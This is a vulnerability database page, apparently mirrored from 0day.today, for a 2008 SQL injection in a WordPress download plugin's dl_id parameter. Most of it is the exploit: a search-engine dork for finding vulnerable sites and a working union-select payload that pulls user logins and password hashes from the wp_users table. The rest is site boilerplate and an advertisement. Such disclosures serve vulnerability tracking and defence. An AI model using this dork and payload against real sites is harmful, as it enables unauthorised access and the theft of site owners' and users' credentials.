Lucene search

K

Wordpress Plugin Download (dl_id) SQL Injection Vulnerability

🗓️ 31 Mar 2008 00:00:00Reported by BL4CKType 
zdt
 zdt
🔗 0day.today👁 30 Views

Wordpress Plugin Download (dl_id) SQL Injection Vulnerabilit

Show more
Code
=============================================================
Wordpress Plugin Download (dl_id) SQL Injection Vulnerability
=============================================================



###############################################################
#
# Wordpress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:
http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]
SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################



#  0day.today [2018-01-02]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
31 Mar 2008 00:00Current
7.1High risk
Vulners AI Score7.1
30
.json
Report